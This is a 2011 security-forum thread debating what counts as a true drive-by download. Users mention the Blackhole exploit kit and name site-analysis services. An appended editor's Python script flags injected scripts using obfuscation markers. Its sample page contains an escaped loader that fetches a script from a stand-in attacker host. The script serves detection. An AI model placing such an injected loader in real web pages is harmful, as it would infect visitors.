Drive-by Downloads

Discussion in 'malware problems & news' started by CloneRanger, Oct 16, 2011.

Thread Status:
Not open for further replies.
  1. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Ain't what they used to be !

    There was a time when DBD infections occurred without user interaction, due to having ActiveX & Scripting etc running full time :thumbd:

    Now it "seems" that, yes, there are still some DBD's waiting to pounce, but they now require user interaction before infecting.

    If you know of any recent instances otherwise, please post, but NOT direct links ;)

    Also what are your thoughts in general about recent/current DBD's ability, or otherwise to infect ?
     
  2. MrBrian

    MrBrian Registered Member

    Joined:
    Feb 24, 2008
    Posts:
    6,032
    Location:
    USA
    For some statistics see https://www.wilderssecurity.com/showpost.php?p=1957300&postcount=4.

    Definition (from http://www.nsslabs.com/resources/white-papers/265/threat-definitions.html):
     
    Last edited: Oct 16, 2011
  3. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,516
    That is a good thing though, for most people.
     
  4. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I've run into dozens of Java drive-by's. Plenty of IE6 drive-by's.

    The blackhole exploit kit definitely has some.

    If they exist for Chrome I haven't seen them and I haven't had any flash.
     
  5. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    There are plenty of drive-by downloads out there, but you won't notice most of them on a patched machine - unless your AV or NoScript complains about a dodgy obfuscated Javascript on a page. The only sign for many (regardless of whether an exploit was successful) is that their browser might have crashed, something which most just put down to a buggy browser.

    I get asked to check out pages for people often when their AV (usually Avast) complains about a certain page - in most cases it's usually a script for Blackhole Exploit Kit added to a UK website for a local business of some sort - e.g. a local car dealer, or local real estate agent, etc. Old software, bad passwords.

    I don't hear about infected ads nearly as much any more - the last time was for a local forum I occasionally read, but by the time I'd heard about it it had been sorted. With Adblock, it's like they don't exist as a webthreat.
     
    Last edited: Oct 16, 2011
  6. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I still hear about infected ads once in a while. There's usually a month or so where I hear a ton about it and then it goes away.
     
  7. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    5,829
    Location:
    Last Breath Farm
    That is very encouraging to hear!
     
  8. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Can you cite an example? Just a description -- you don't have to give a URL.

    Thanks,

    -rich
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I've seen some .swl files cached from Blackhole on a site, but never have had an actual exploit using it. The JAVA exploit has always taken precedence. This is with IE8.

    regards,

    -rich
     
  10. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I don't see the flash because they don't break the sandbox. Blackhole exploit kit probably has some in there.
     
  11. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @ Rmus

    Hi there.

    Hopefully some of these will do.

    Thought the following might interest you, & maybe others too ;)

     
  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Wow! I didn't realize how much the term "Drive-by Download" has been expanded to include so many scenarios!

    Well, all scenarios where some user action is involved go beyond the simple situation where just going to a web page or opening the USB drive triggers code to install malware. This situation is very easily dealt with, of course.

    Malware piggybacking on installers or programs is nothing new, but more properly relates to User Policies, in my view.

    For instance, your second example mentions File Sharing and the Xupiter toolbar. I believe that Xupiter was well-documented as spyware; and File Sharing, well, what can one say?

    In my not-so-humble opinion on this important matter, none of these deserves to be placed in the distinctive and honorary class of the true Drive-by Download!

    regards,

    -rich
     
  13. treehouse786

    treehouse786 Registered Member

    Joined:
    Jun 6, 2010
    Posts:
    1,388
    Location:
    Lancashire
    completely agree with you :thumb:
     
  14. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Yeah no need to be humble about it ;)

    I also agree, TRUE DBD's should be in a class of their own. Which is why I initially said DBD's "Ain't what they used to be !" according to some out there anyway !

    I guess a number of infections are partially DBD's due to the initial code that gets automatically loaded without user intervention. But after that, if users get click happy, then it's not truly DBD anymore. Maybe they should be called PDBD ?
     
  15. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    I agree with you.

    For example, let's take example number 1.

    1 - Downloads which a person authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).

    This makes me think of social engineering and not drive-by downloads.
     
  16. MrBrian

    MrBrian Registered Member

    Joined:
    Feb 24, 2008
    Posts:
    6,032
    Location:
    USA
    +1 :thumb:

    Drive-by downloads can include a social engineering component in those cases in which a user is enticed to visit a bad website. However, once at a given website, I consider a drive by download to have occurred only if vulnerabilities were exploited.
     
  17. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    This is how I feel as well.
     
  18. rrrh1

    rrrh1 Registered Member

    Joined:
    Sep 10, 2007
    Posts:
    202
    Anyone know of a website that can check other sites for drive by downloads ?

    I sent a friend of mine a link and he said he got something there.

    He's running 7x64 and I am running XPSP3.

    I have no problems at all except for all the ads on the site.

    Since this thread is about Drive by Downloads I thought it would be a great place to ask.

    rrrh1 (arch1)
     
  19. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    There are multiple approaches to take.

    The most obvious is to look at the HTML yourself (from a sandboxed browser). When legitimate sites are hacked, a script is added to the bottom of the HTML pointing toward a site hosting an exploit kit. Nowadays the script will be obfuscated, meaning made unclear so you can't tell where it goes. Look for "<script".

    You can use Wepawet (http://wepawet.iseclab.org/), but some of the analysis needs to be done visually as I believe the exploit kits are trying to hide from it. Look at the requests and redirects at the bottom, and then research the external sites. When you've seen exploit kit links enough, it's clearer which are the dodgy links. If the analysis is successful, Wepawet will show what malicious downloads have been made, comment on malicious Javascript, etc.

    Anubis lets you analyse a site in a different way (http://anubis.iseclab.org/).

    You can also check websites with Virustotal.com or URLVoid (http://www.urlvoid.com/), for both scans as well as reputation.

    Then there are more advanced analysis tools like Malzilla. I've a lot to learn to use that effectively.

    PM me the URL if you want.
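
    The manual check described above (a script tag appended below the page body, pointing off-site or wrapped in escape/eval obfuscation) can be turned into a quick first-pass triage. The following is an added example by the editor, not code from the thread or from any tool mentioned in it; the marker list and the sample page with its .example hostnames are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Markers commonly seen in obfuscated injected loaders (assumption: editor-chosen list).
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")

class ScriptCollector(HTMLParser):
    # Records each <script> with its src, inline body and line number, and where </body> closed.
    def __init__(self):
        super().__init__()
        self.scripts, self.body_end, self._cur = [], None, None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._cur = {"src": dict(attrs).get("src"), "body": "", "line": self.getpos()[0]}
    def handle_data(self, data):
        if self._cur is not None:
            self._cur["body"] += data
    def handle_endtag(self, tag):
        if tag == "script" and self._cur is not None:
            self.scripts.append(self._cur)
            self._cur = None
        elif tag == "body":
            self.body_end = self.getpos()[0]

def triage(html, site_host):
    """Return (line, reasons) for every <script> that trips an injection heuristic."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for s in p.scripts:
        reasons = []
        if p.body_end is not None and s["line"] > p.body_end:
            reasons.append("appended after </body>")
        host = urlparse(s["src"]).hostname if s["src"] else None
        if host and host != site_host:
            reasons.append("external src " + host)
        if any(m in s["body"] for m in OBFUSCATION_MARKERS):
            reasons.append("obfuscation markers in inline body")
        if reasons:
            findings.append((s["line"], reasons))
    return findings

# Constructed sample: a small-business page with legitimate same-host scripts, plus an
# escaped loader appended below </body> (hostnames use the reserved .example TLD).
SAMPLE_HTML = """<html><head><title>Car Dealer</title>
<script src="http://localbiz.example/js/menu.js"></script></head>
<body><h1>Welcome</h1><script>var year = 2011;</script></body>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fevil.example%2Fkit%2Fin.php%22%3E%3C%2Fscript%3E'));</script></html>"""
```

    Run it on HTML saved from a sandboxed browser with `triage(page_html, "the-site-host")`; each hit still needs the manual follow-up the post describes, since legitimate CDN scripts also show up as external.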
     